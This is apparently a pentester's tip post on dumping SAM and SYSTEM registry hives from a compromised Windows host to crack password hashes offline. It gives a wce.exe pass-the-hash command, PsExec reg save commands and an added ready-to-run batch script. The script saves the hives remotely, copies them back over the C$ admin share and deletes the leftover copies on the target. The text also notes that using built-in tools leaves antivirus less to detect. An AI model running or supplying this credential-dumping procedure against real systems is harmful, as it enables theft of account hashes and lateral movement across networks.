- This command came in very handy on a recent pentest. It lets us dump the SAM and SYSTEM registry hives from a compromised host using nothing but reg.exe, a signed Windows binary, so no credential-dumping tool has to be written to the victim's disk and A/V has far less to flag. (If you go in over PsExec, the PsExec service binary is still dropped on the target; the hive extraction itself leaves no extra tooling behind.) Note that this is a post-exploitation task: it assumes you already have SYSTEM or local administrator access on the host, or hold a privileged hash you can authenticate with from a remote system. The saved hives are then cracked or parsed offline (SYSTEM holds the boot key needed to decrypt the hashes in SAM, which is why both are taken).
- If you wish to perform this attack remotely you need the relevant hash and wce (Windows Credentials Editor). The following spawns a cmd.exe whose logon session carries the supplied NTLM hash, so anything launched from it authenticates with that hash over the network:
- wce.exe -s administrator:DOMAIN:LMHASH:NTHASH -c cmd.exe
- The -s argument is username:domain:lmhash:nthash. The second field is the domain (for a local account, use the target's hostname), not the RID 500 that appears in that position in pwdump-style output.
- Then in the spawned window you can use the following:
- PsExec.exe \\%VICTIM_IP% reg save hklm\system %LOCATION%\system.hiv & PsExec.exe \\%VICTIM_IP% reg save hklm\sam %LOCATION%\sam.hiv
- reg save runs on the victim, so %LOCATION% is a path on the victim's disk, and each hive needs its own file name (reg save will not silently overwrite an existing file without /y). Afterwards, copy the two files back, for example over the C$ admin share, and delete them from the target.
- If you have local access you can obviously drop the wce and psexec sections and run the two reg save commands directly from an elevated prompt.
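The whole remote sequence as one script, added here as an example and not part of the original paste: it is meant to be run from the cmd.exe spawned by wce.exe -s, saves each hive to its own file on the victim, pulls both back over the C$ admin share, and cleans up. VICTIM, REMOTE_DIR and LOCAL_DIR are assumed values to replace.

```batch
@echo off
REM Added example (not from the original paste). Run from the cmd.exe that
REM wce.exe -s spawned, so PsExec and the admin share use the injected hash.
REM Assumed values - replace for your engagement:
set VICTIM=10.0.0.5
set REMOTE_DIR=C:\Windows\Temp
set REMOTE_SHARE=\\%VICTIM%\C$\Windows\Temp
set LOCAL_DIR=C:\loot\%VICTIM%

if not exist "%LOCAL_DIR%" mkdir "%LOCAL_DIR%"

REM reg save executes on the victim, so REMOTE_DIR is a path on the victim.
REM Each hive gets its own file; /y lets a re-run overwrite a stale copy.
PsExec.exe -accepteula \\%VICTIM% reg save hklm\sam "%REMOTE_DIR%\sam.hiv" /y
if errorlevel 1 goto :fail
PsExec.exe -accepteula \\%VICTIM% reg save hklm\system "%REMOTE_DIR%\system.hiv" /y
if errorlevel 1 goto :fail

REM Pull the hives back over the admin share with the same credentials.
copy "%REMOTE_SHARE%\sam.hiv" "%LOCAL_DIR%\" >nul
if errorlevel 1 goto :fail
copy "%REMOTE_SHARE%\system.hiv" "%LOCAL_DIR%\" >nul
if errorlevel 1 goto :fail

REM Remove the copies left on the victim's disk.
del "%REMOTE_SHARE%\sam.hiv" "%REMOTE_SHARE%\system.hiv"

echo Hives saved to %LOCAL_DIR% (parse offline with SYSTEM for the boot key)
goto :eof

:fail
echo Failed against %VICTIM%: check the hash is privileged, that the admin
echo share is reachable, and that PsExec could install its service.
exit /b 1
```

The two PsExec calls are separated by errorlevel checks rather than a single `&` so that a failed SAM save is noticed before the SYSTEM save and the copies run; with `&` the second command runs regardless of the first's result.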